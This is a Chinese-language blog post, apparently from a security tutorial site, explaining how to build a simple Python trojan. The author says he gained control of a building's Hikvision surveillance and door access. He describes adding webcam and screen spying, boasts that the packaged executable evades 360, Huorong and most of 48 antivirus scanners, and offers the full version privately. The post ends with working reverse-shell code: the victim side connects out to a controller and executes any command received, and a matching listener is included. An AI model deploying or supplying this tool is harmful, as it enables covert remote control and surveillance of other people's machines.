木马如何生成--简易木马的制作，从零基础到精通，收藏这篇就够了！

最新推荐文章于 2025-08-14 08:15:00 发布

原创最新推荐文章于 2025-08-14 08:15:00 发布 · 2.2k 阅读

19 ·

本内容遵循CC 4.0 BY-SA版权协议

GEO检测

标签

#网络 #安全 #云原生

渗透测试同时被 3 个专栏收录

1674 篇文章

订阅专栏

网络安全

1039 篇文章

订阅专栏

编程

881 篇文章

订阅专栏

Python3.8

Conda

Python

Python 是一种高级、解释型、通用的编程语言，以其简洁易读的语法而闻名，适用于广泛的应用，包括Web开发、数据分析、人工智能和自动化脚本

很久没写了，没有什么好的灵感写内容。这两周花了点时间研究海康威视的使用和构成，机缘巧合也是拿下了整栋科技楼的监控和开门权限，收获还是挺大的，但因为涉及敏感没有撰文。

这次本文不写学习经验和推荐，而是专门分享一下如何制作简易性木马程序，一方面激发大家的学习兴趣，也好更积极的学习网络安全知识。同时也是觉得要真正的防御木马威胁，还是需要了解木马的生成细节。一直都在使用加载器生成的木马却不知所以然，虽然用些脚本可以免杀绕过360和常规的市面查杀工具，但终究是盲人摸象。生成木马的脚本因为篇幅问题，我把它部分开源放到最后。

木马病毒通常是基于计算机网络的，是基于客户端和服务端的通信、监控程序

而程序类型中我们最为熟悉的就是exe程序，可以直接在Windows系统上运行。

这一次也是因为复习了计组内容发现某种层次上可以解释为什么木马可以用不同的语言来编译生成。我们常接触的C语言、python、go等这些有着一定语法规定的编程语言，大部分定义为高级语言，而它是如何能够让计算机能够理解并且运行(高级语言->汇编语言->机器语言)

可以看下面这个图

这里要知道两点:

看到这，我就开始好奇编译程序为何产生，这个编译程序怎么能进行将高级语言转化为汇编语言，我在搜索引擎中找到了这个介绍

相当于创作者把实现某个特定功能的汇编语言封装成一个特定名字的函数，某种概念上和我们学的c语言自定义函数一样。

了解了这个逻辑，就知道木马的运行实际还是底层的机器语言来驱动程序交互。而我们要制作一个简易木马，追求的是方便，肯定是通过高级语言来写，站在巨人的肩膀可以帮我们省力很多，这里我使用python语言。

服务端(被控制的电脑)和客户端(攻击机)的代码

运行监听和木马程序

成功看到回应，一个交互式的终端生成。其实本质上就是通过socket来进行连接双方服务器，将攻击机的运行指令接受再通过调用将结果返回。

当然你会觉得这个只是脚本，不算木马，这里我们可以直接运行pyinstaller打包成exe即可

pyinstaller --onefile 1.py

成功回连，dir查看目录下的muma。

在这里也想到一个绕过方式，单纯运行木马脚本不会报毒。并且直接运行生成的exe文件火绒也没有报毒(只有windows defender会报一个运行的窗口，也不会显示病毒),可能是自己写的这种只有交互的太弱了。

所以我再次进行升级，我想融入摄像头监控功能和屏幕监控，成功实现,这里遇到一个问题就是进程交互的时候进行video查看视频会导致进程阻塞。最后调试多次查询也是找到了问题。

单摄像头监控实现效果

最后再进行加入远程屏幕监控功能，用socket进行实时传播图片数据，再用多线程来规避进程阻塞问题，实现视频监控同时可以进行终端交互。

就这样成功实现了简易的监控、摄像、终端三项功能的控制木马程序。当然因为只是简化，程序的性能都会受到一些限制，例如同时开启屏幕监控和摄像头后就会容易卡死，想要优化就需要更多的知识来进行改造。这里也是借着复习机会来研究一下这个，其实还可以去看下shellcode最为原始的汇编代码，或者反编译一个exe木马程序来学习下，我觉得都是极为不错的网安实验。

并且在自己编写的过程中发现打包出来的exe文件竟然可以过360和火绒，最后48款查杀中只有两款能测出，可能是样本较小就比较好过。

本次内容就到这，其实木马主要都是通过运行exe文件来上线，所以只要不随意下载软件就可以规避大部分陷阱，还有一些会把程序藏匿在合法的白程序中如同特洛伊木马一样，让你不知不觉中中毒。接下来如果有空，会写一篇常见的钓鱼方式，例如水坑攻击，钓鱼网站链接，压缩包程序木马等容易被上马和信息泄露的方式。只有真正了解才能最大程度避免。

如果有兴趣的还可以继续研究，如何给自己的木马免杀，研究下各个厂商的杀毒软件对于特征的侧重检查，如果你也想自己制作一个木马来研究学习，可以私信我，因为程序比较敏感和代码量合起来长达200多行也不好直接贴在下面。下面就贴一个最初的交互版本，完整版私信我，如果你感兴趣的话。

被控端

import socket``import subprocess``import os``def connect(ip, port):`    `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`    `s.connect((ip, port))`    `return s``def receive_commands(s):`    `while True:`        `command = s.recv(1024).decode()`        `if command.lower() == 'exit':`            `s.close()`            `break`        `elif command[:2] == 'cd':`            `os.chdir(command[3:])`            `s.send(b'Changed directory')`        `else:`            `result = subprocess.run(command, shell=True, capture_output=True)`            `s.send(result.stdout + result.stderr)``if __name__ == '__main__':`    `ip = '127.0.0.1'  # 控制服务器的IP地址`    `port = 4444        # 控制服务器的端口`    `s = connect(ip, port)`    `receive_commands(s)

客户端

import socket``def start_server(ip, port):`    `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`    `s.bind((ip, port))`    `s.listen(5)`    `print(f'[*] Listening on {ip}:{port}')`    `return s``def handle_client(client_socket):`    `while True:`        `command = input('> ')`        `client_socket.send(command.encode())`        `if command.lower() == 'exit':`            `break`        `result = client_socket.recv(4096).decode('gbk')`        `print(result)``if __name__ == '__main__':`    `ip = '127.0.0.1'  # 控制服务器的IP地址`    `port = 4444        # 控制服务器的端口`    `server = start_server(ip, port)`    `client_socket, addr = server.accept()`    `print(f'[*] Connection from {addr}')`    `handle_client(client_socket)